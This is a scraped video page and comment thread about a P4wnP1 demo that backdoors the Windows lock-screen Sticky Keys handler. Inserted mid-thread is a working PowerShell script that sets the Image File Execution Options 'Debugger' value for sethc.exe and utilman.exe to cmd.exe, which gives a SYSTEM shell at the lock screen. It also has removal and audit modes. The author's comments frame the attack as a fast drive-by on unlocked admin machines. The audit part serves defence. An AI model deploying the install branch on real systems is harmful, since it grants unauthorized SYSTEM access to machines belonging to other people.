Backdoor Windows lockscreen with P4wnP1

  • Published on Aug 30, 2017
  • This is a demo of an unreleased payload.
    It backdoors the lock screen "Sticky Keys" handler of Windows 7 / Windows 10 with a cmd.exe shell run as the SYSTEM user.
    Don't work with privileged accounts if not needed!
    Lock your machine when unused!
    The payload teaches:
    - how to use KEYBOARD triggers to branch into different payload sections (NUMLOCK = backdoor install, SCROLLLOCK = backdoor removal)
    - how to bypass UAC
    Project page:
  • Science & Technology

Comments • 21

  • Shawn Briere
    Shawn Briere 7 months ago

    Testing this on a fully patched Windows 10 machine, this appears to no longer work because Windows Defender is blocking it. I still love this device though, many great features...especially for pranks.

  • Aleksei Buivol
    Aleksei Buivol 8 months ago

    In new Windows this method doesn't work

  • Gazza-in-the-usa
    Gazza-in-the-usa 8 months ago

    Got to say this is pretty crap if you are trying to un-password an old PC.

  • cam 5
    cam 5 9 months ago

    So this payload copies cmd.exe, renames the sticky keys program and calls the copy of cmd.exe whatever the sticky keys program is. Can't this payload be stopped by disabling shift times for sticky keys in control panel?

    • TheMaMe82
      TheMaMe82  9 months ago

      It loads cmd.exe as debugger target, so nothing is copied around. Not sure on the proposed mitigation, but utilman.exe still is there

  • Ahmad Abo aljod Barsa

    Isn't it just renaming some exe with cmd.exe, so when you press shift five times it will be the renamed cmd.exe? I've made something like that once with MS-DOS

    • TheMaMe82
      TheMaMe82  Year ago +1

      The binaries you're referring to are `utilman` or `sethc`.
      Yes, that's the basic idea, but instead of replacing them, cmd.exe is preloaded as debugger. No binary changing, no reboot.
      Anyway, the techniques are old and well understood. This PoC is to highlight how fast it could be done (and reverted) if one automates this process and runs it on unlocked admin workstations in drive-by fashion.
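
The mechanism the video description outlines (NUMLOCK installs the backdoor, SCROLLLOCK removes it) and that TheMaMe82 spells out above (cmd.exe preloaded as the debugger for sethc.exe / utilman.exe, no binary copied, no reboot) is the Image File Execution Options (IFEO) "Debugger" hook. The script below is an added example and is not the P4wnP1 payload or any code from the project: it mirrors the install/remove branches as a `-Action` switch on the Windows side and adds the audit a defender would run. The target list, the parameter and function names are my assumptions; the P4wnP1 keyboard-LED trigger logic and the UAC bypass the description mentions are not reproduced here, and the HKLM writes need an already elevated session.

```powershell
# Added example, not the P4wnP1 payload. Demonstrates the IFEO "Debugger" hook
# that the video's author describes: when winlogon launches sethc.exe on the
# lock screen (Shift pressed five times), Windows starts the registered
# debugger instead, so cmd.exe appears with the launching (SYSTEM) token.
# Nothing is copied or renamed; removing the value fully reverts the change.
# Requires an elevated PowerShell session (HKLM is written).
# Assumptions: target list, parameter names and function names are mine.
param(
    [ValidateSet('Install', 'Remove', 'Audit')]
    [string]$Action = 'Audit',
    # Accessibility binaries that winlogon can launch from the lock screen
    [string[]]$Targets = @('sethc.exe', 'utilman.exe')
)

$IfeoRoot = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'
$Debugger = "$env:SystemRoot\System32\cmd.exe"

function Install-Hook([string]$Target) {
    $key = Join-Path $IfeoRoot $Target
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    New-ItemProperty -Path $key -Name 'Debugger' -Value $Debugger `
        -PropertyType String -Force | Out-Null
    "installed: $Target -> $Debugger"
}

function Remove-Hook([string]$Target) {
    $key = Join-Path $IfeoRoot $Target
    if (Test-Path $key) {
        Remove-ItemProperty -Path $key -Name 'Debugger' -ErrorAction SilentlyContinue
        # Only drop the key when no other values (e.g. MitigationOptions) remain
        if (-not (Get-Item $key).Property) { Remove-Item -Path $key }
    }
    "removed: $Target"
}

# Defender side: list every IFEO entry that carries a Debugger value at all.
# Legitimate entries are rare, so a Debugger on an accessibility binary is a
# strong indicator of exactly this backdoor.
function Get-IfeoDebuggers {
    Get-ChildItem $IfeoRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $dbg = (Get-ItemProperty $_.PSPath -Name 'Debugger' -ErrorAction SilentlyContinue).Debugger
        if ($dbg) {
            [pscustomobject]@{
                Image      = $_.PSChildName
                Debugger   = $dbg
                Suspicious = ($_.PSChildName -in $Targets)
            }
        }
    }
}

switch ($Action) {
    'Install' { $Targets | ForEach-Object { Install-Hook $_ } }
    'Remove'  { $Targets | ForEach-Object { Remove-Hook $_ } }
    'Audit'   { Get-IfeoDebuggers | Format-Table -AutoSize }
}
```

Run it as `.\ifeo-hook.ps1 -Action Install` / `-Action Remove` from an elevated prompt to reproduce the two payload branches, and `-Action Audit` (no elevation needed for reading) to check a machine after an unattended session. The audit deliberately reports any Debugger value rather than only the two known targets, since the same hook works for any image name.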

  • CalabreseMPC
    CalabreseMPC Year ago +5

    first step: login with admin.

    • TheMaMe82
      TheMaMe82  Year ago +1

      CalabreseMPC The real-world scenario for this would be a fast drive-by on an unlocked box with a privileged user logged in.
      Of course it wouldn't be a problem to get system privs on a Windows box with physical access, but it takes some time.
      So again, this PoC is about fast drive-by on an unlocked box (time constraint).
      Should have been more clear on this.

  • Emanuel Lang
    Emanuel Lang 2 years ago

    Hey, I have a question.... When I connect the Raspberry to my own computer, how do I make it so that it doesn't "hack" my computer too, but instead lets me access the P4wnP1 and read out the data?

  • vikas gajjar
    vikas gajjar 2 years ago

    Waiting for it

  • ▐ ᴇʟᴍᴏᴅᴏ7▐

    Cool one, gj!

  • vrkiller 22
    vrkiller 22 2 years ago

    TheMaMe82 please make payloads for Android

  • TheMaMe82
    TheMaMe82  2 years ago

    The payload has been included in the repo in the meantime.

  • Julio Ramos
    Julio Ramos 2 years ago


    • TheMaMe82
      TheMaMe82  2 years ago

      HalfCupOfWater should better have targeted utilman.exe, I guess ;-)

    • ▐ ᴇʟᴍᴏᴅᴏ7▐
      ▐ ᴇʟᴍᴏᴅᴏ7▐ 2 years ago

      oh fuck hahah
      that's a weird sense of humor! =D

    • HalfCupOfWater
      HalfCupOfWater 2 years ago +1

      I was pretending that the point of the hack was what was being replaced instead of what it was being replaced with. Some kind of comical misunderstanding. Sorry, it wasn't very funny. Also forgot an 'it'.

    • TheMaMe82
      TheMaMe82  2 years ago


    • HalfCupOfWater
      HalfCupOfWater 2 years ago

      Because the disabled have had too good for too long.